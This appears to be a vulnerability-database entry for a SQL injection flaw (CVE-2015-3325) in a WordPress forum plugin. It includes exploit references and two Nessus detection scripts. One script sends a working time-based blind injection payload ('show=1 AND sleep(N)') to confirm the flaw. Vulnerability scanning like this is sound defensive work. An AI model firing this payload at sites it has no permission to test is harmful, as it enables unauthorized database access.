Vulnerabilities > CVE-2015-3325 - SQL Injection vulnerability in Wpsymposium WP Symposium

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
wpsymposium
CWE-89
nessus
exploit available

Summary

SQL injection vulnerability in forum.php in the WP Symposium plugin before 15.4 for WordPress allows remote attackers to execute arbitrary SQL commands via the show parameter in the QUERY_STRING to the default URI.

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Command Line Execution through SQL Injection
    An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
  • Object Relational Mapping Injection
    An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject his or her own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible.
  • SQL Injection through SOAP Parameter Tampering
    An attacker modifies the parameters of the SOAP message that is sent from the service consumer to the service provider to initiate a SQL injection attack. On the service provider side, the SOAP message is parsed and parameters are not properly validated before being used to access a database in a way that does not use parameter binding, thus enabling the attacker to control the structure of the executed SQL query. This pattern describes a SQL injection attack with the delivery mechanism being a SOAP message.
  • Expanding Control over the Operating System from the Database
    An attacker is able to leverage access gained to the database to read / write data to the file system, compromise the operating system, create a tunnel for accessing the host machine, and use this access to potentially attack other machines on the same network as the database machine. Traditionally SQL injections attacks are viewed as a way to gain unauthorized read access to the data stored in the database, modify the data in the database, delete the data, etc. However, almost every data base management system (DBMS) system includes facilities that if compromised allow an attacker complete access to the file system, operating system, and full access to the host running the database. The attacker can then use this privileged access to launch subsequent attacks. These facilities include dropping into a command shell, creating user defined functions that can call system level libraries present on the host machine, stored procedures, etc.
  • SQL Injection
    This attack exploits target software that constructs SQL statements based on user input. An attacker crafts input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended. SQL Injection results from failure of the application to appropriately validate input. When specially crafted user-controlled input consisting of SQL syntax is used without proper validation as part of SQL queries, it is possible to glean information from the database in ways not envisaged during application design. Depending upon the database and the design of the application, it may also be possible to leverage injection to have the database execute system-related commands of the attackers' choice. SQL Injection enables an attacker to talk directly to the database, thus bypassing the application completely. Successful injection can cause information disclosure as well as ability to add or modify data in the database. In order to successfully inject SQL and retrieve information from a database, an attacker:

D2sec

nameWordpress WP Symposium 15.1 SQL Injection
urlhttp://www.d2sec.com/exploits/wordpress_wp_symposium_15.1_sql_injection.html

Exploit-Db

descriptionWordPress WP Symposium Plugin 15.1 SQL Injection Vulnerability. CVE-2015-3325. Webapps exploit for php platform
fileexploits/php/webapps/37080.txt
idEDB-ID:37080
last seen2016-02-04
modified2015-05-21
platformphp
port80
published2015-05-21
reporterHannes Trunde
sourcehttps://www.exploit-db.com/download/37080/
titleWordPress WP Symposium Plugin 15.1 SQL Injection Vulnerability
typewebapps

Nessus

  • NASL familyCGI abuses
    NASL idWORDPRESS_WP_SYMPOSIUM_FORUM_SQL_INJECTION.NASL
    descriptionThe WordPress WP Symposium Plugin installed on the remote host is affected by a SQL injection vulnerability due to a failure to properly sanitize user-supplied input to the
    last seen2020-06-01
    modified2020-06-02
    plugin id83525
    published2015-05-18
    reporterThis script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/83525
    titleWP Symposium Plugin for WordPress forum.php 'show' Parameter SQL Injection
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(83525);
      script_version("1.10");
      script_cvs_date("Date: 2019/11/22");
    
      script_cve_id("CVE-2015-3325");
      script_bugtraq_id(74237);
      script_xref(name:"EDB-ID", value:"37080");
    
      script_name(english:"WP Symposium Plugin for WordPress forum.php 'show' Parameter SQL Injection");
      script_summary(english:"Attempts to inject SQL code via the 'show' parameter.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote web server hosts a web application that is affected by a
    SQL injection vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The WordPress WP Symposium Plugin installed on the remote host is
    affected by a SQL injection vulnerability due to a failure to properly
    sanitize user-supplied input to the 'show' parameter of the forum.php
    script. An unauthenticated, remote attacker can exploit this issue to
    inject or manipulate SQL queries in the back-end database, resulting
    in the manipulation or disclosure of arbitrary data.");
      script_set_attribute(attribute:"see_also", value:"https://www.openwall.com/lists/oss-security/2015/04/14/5");
      # https://packetstormsecurity.com/files/131801/WordPress-WP-Symposium-15.1-SQL-Injection.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?7a6b17f4");
      script_set_attribute(attribute:"see_also", value:"https://plugins.trac.wordpress.org/changeset/1153677/wp-symposium");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to WP Symposium Plugin version 15.4 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"d2_elliot_name", value:"Wordpress WP Symposium 15.1 SQL Injection");
      script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
      script_set_attribute(attribute:"exploited_by_nessus", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2015/04/14");
      script_set_attribute(attribute:"patch_publication_date", value:"2015/05/05");
      script_set_attribute(attribute:"plugin_publication_date", value:"2015/05/18");
    
      script_set_attribute(attribute:"potential_vulnerability", value:"true");
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:wpsymposium:wp_symposium");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("wordpress_detect.nasl", "wordpress_wp_symposium_gid_sql_injection.nasl");
      script_require_keys("installed_sw/WordPress", "www/PHP", "Settings/ParanoidReport");
      script_require_ports("Services/www", 80);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("webapp_func.inc");
    
    app = "WordPress";
    get_install_count(app_name:app, exit_if_zero:TRUE);
    
    port = get_http_port(default:80, php:TRUE);
    
    install = get_single_install(
      app_name : app,
      port     : port
    );
    
    dir = install['path'];
    url_path = install['Redirect'];
    install_url = build_url(port:port, qs:dir);
    
    plugin = 'WP Symposium';
    # Check KB first
    installed = get_kb_item("www/"+port+"/webapp_ext/"+plugin+" under "+dir);
    if (!installed)
      audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + " plugin");
    
    if (report_paranoia < 2) audit(AUDIT_PARANOID);
    
    pid = NULL;
    pid_url = NULL;
    
    if (!isnull(url_path)) url = url_path;
    else url = dir + "/";
    
    # First send a request to try and determine if the forum component is in
    # use with WP Symposium
    res = http_send_recv3(
      method       : "GET",
      port         : port,
      item         : url,
      exit_on_fail : TRUE
    );
    
    if ("/wp-content/plugins/wp-symposium/" >< res[2])
    {
      match = eregmatch(
        pattern : 'var __wps__ = \\{.*,"forum_url":"(.*[^"])","mail_url',
        string  : res[2]
      );
    
      if (!empty_or_null(match[1]))
      {
        # Get page id
        if ("page_id" >< match[1])
        {
          match2 = eregmatch(pattern:'\\?page_id=(.+)', string:match[1]);
          if (!empty_or_null(match2[1]))
            pid = match2[1];
        }
        else
        # Get page url (permalinks in use)
        {
          pid_dir =  ereg_replace(pattern:"/", string:match[1], replace:"");
          match2 = eregmatch(pattern:"^http:(.+)(\\.*)", string:pid_dir);
          if (!empty_or_null(match2[2]))
          {
            pid_url = ereg_replace(pattern:"\\", string:match2[2], replace:"");
          }
        }
      }
    }
    else
      exit(0, "Nessus was unable to locate a " + plugin + " forum on the " + app + " install located at " + install_url);
    
    if (empty_or_null(pid) && empty_or_null(pid_url))
      exit(0, "Nessus was unable to find a forum associated with the " + plugin + " plugin installed on the " + app + " install located at " + install_url);
    
    stimes = make_list(3, 5, 7);
    num_queries = max_index(stimes);
    vuln = FALSE;
    
    for (i = 0; i < max_index(stimes); i++)
    {
      http_set_read_timeout(stimes[i] + 10);
      then = unixtime();
    
      if (!empty_or_null(pid))
        attack_url = "?page_id=" +pid+ "&cid=1&show=1%20AND%20sleep(" +stimes[i]+ ");";
      else
        attack_url = pid_url + "/?cid=1&show=1%20AND%20sleep(" +stimes[i]+ ");";
    
      res = http_send_recv3(
        method       : "GET",
        port         : port,
        item         : url + attack_url,
        exit_on_fail : TRUE
      );
      now = unixtime();
      ttime = now - then;
    
      time_per_query += 'Query #' + (i+1) + ' : ' + query + ' Sleep Time : ' +
      stimes[i] + ' secs  Response Time : ' + ttime + ' secs\n';
    
      overalltime += ttime;
    
      if ( (ttime >= stimes[i]) && (ttime <= (stimes[i] + 5)) )
      {
        vuln = TRUE;
        output =
          'Blind SQL Injection Results' +
          '\n  Query                          : sleep(' +stimes[i]+ ')' +
          '\n  Response time                  : ' + ttime + ' secs' +
          '\n  Number of queries executed     : ' + num_queries +
          '\n  Total test time                : ' + overalltime + ' secs' +
          '\n  Time per query                 : ' +
          '\n'+ "  " + time_per_query;
    
      #  output = 'The request produced a sleep time of ' + ttime + ' seconds.';
        continue;
      }
      else
        vuln = FALSE;
    }
    if (!vuln)
      audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + " plugin");
    
    security_report_v4(
      port       : port,
      severity   : SECURITY_HOLE,
      generic    : TRUE,
      sqli       : TRUE,  # Sets SQLInjection KB key
      request    : make_list(install_url + attack_url),
      output     : output
    );
    
  • NASL familyCGI abuses
    NASL idWORDPRESS_WP_SYMPOSIUM_15_4.NASL
    descriptionThe WordPress WP Symposium Plugin installed on the remote host is affected by a SQL injection vulnerability due to a failure to properly sanitize user-supplied input to the
    last seen2020-06-01
    modified2020-06-02
    plugin id83524
    published2015-05-18
    reporterThis script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/83524
    titleWP Symposium Plugin for WordPress forum.php 'show' Parameter SQL Injection (Version Check)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(83524);
      script_version("1.7");
      script_cvs_date("Date: 2019/11/22");
    
      script_cve_id("CVE-2015-3325");
      script_bugtraq_id(74237);
    
      script_name(english:"WP Symposium Plugin for WordPress forum.php 'show' Parameter SQL Injection (Version Check)");
      script_summary(english:"Checks version of WP Symposium plugin");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote web server hosts a web application that is affected by a
    SQL injection vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The WordPress WP Symposium Plugin installed on the remote host is
    affected by a SQL injection vulnerability due to a failure to properly
    sanitize user-supplied input to the 'show' parameter of the forum.php
    script. An unauthenticated, remote attacker can exploit this issue to
    launch a SQL injection attack against the affected application,
    resulting in the manipulation and disclosure of arbitrary data.
    
    Note that Nessus has not tested for this issue but has instead
    relied only on the application's self-reported version number.");
      script_set_attribute(attribute:"see_also", value:"https://www.openwall.com/lists/oss-security/2015/04/14/5");
      # https://packetstormsecurity.com/files/131801/WordPress-WP-Symposium-15.1-SQL-Injection.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?7a6b17f4");
      script_set_attribute(attribute:"see_also", value:"https://plugins.trac.wordpress.org/changeset/1153677/wp-symposium");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to WP Symposium Plugin version 15.4 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"d2_elliot_name", value:"Wordpress WP Symposium 15.1 SQL Injection");
      script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2015/04/14");
      script_set_attribute(attribute:"patch_publication_date", value:"2015/05/05");
      script_set_attribute(attribute:"plugin_publication_date", value:"2015/05/18");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:wpsymposium:wp_symposium");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("wordpress_detect.nasl", "wordpress_wp_symposium_gid_sql_injection.nasl");
      script_require_keys("installed_sw/WordPress", "www/PHP");
      script_require_ports("Services/www", 80);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("webapp_func.inc");
    
    app = "WordPress";
    get_install_count(app_name:app, exit_if_zero:TRUE);
    
    port = get_http_port(default:80, php:TRUE);
    
    install = get_single_install(
      app_name : app,
      port     : port
    );
    
    dir = install['path'];
    install_url = build_url(port:port, qs:dir);
    
    plugin = 'WP Symposium';
    # Check KB first
    installed = get_kb_item("www/"+port+"/webapp_ext/"+plugin+" under "+dir);
    if (!installed)
      audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + " plugin");
    
    res = http_send_recv3(
      method       : "GET",
      port         : port,
      item         : dir + "/wp-content/plugins/wp-symposium/readme.txt",
      exit_on_fail : TRUE
    );
    
    if (
      'Author: WP Symposium' >< res[2] &&
      'Stable tag:' >< res[2] &&
      'Tested up to:' >< res[2]
    )
    {
      version = UNKNOWN_VER;
      # Grab version
      match = eregmatch(pattern:"Stable tag: ([0-9\.]+)", string:res[2]);
      if (!empty_or_null(match)) version = match[1];
    }
    else exit(0, "Failed to read the 'readme.txt' file for the "+app+ " " + plugin + " plugin located at " + install_url);
    
    if (version == UNKNOWN_VER)
      exit(0, "Unable to determine the version of the " +plugin+ " plugin located on the " +app+ " install at " +install_url);
    
    fix = '15.4';
    if (ver_compare(ver:version, fix:fix, strict:FALSE) == -1)
    {
      set_kb_item(name:'www/'+port+'/SQLInjection', value:TRUE);
    
      if (report_verbosity > 0)
      {
        report =
          '\n  URL               : ' +install_url+
          '\n  Installed version : ' +version+
          '\n  Fixed version     : ' +fix + '\n';
        security_hole(port:port, extra:report);
      }
      else security_hole(port);
      exit(0);
    }
    else audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + ' plugin', version);
    

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/131801/wpsymposium151-sql.txt
idPACKETSTORM:131801
last seen2016-12-05
published2015-05-07
reporterHannes Trunde
sourcehttps://packetstormsecurity.com/files/131801/WordPress-WP-Symposium-15.1-SQL-Injection.html
titleWordPress WP Symposium 15.1 SQL Injection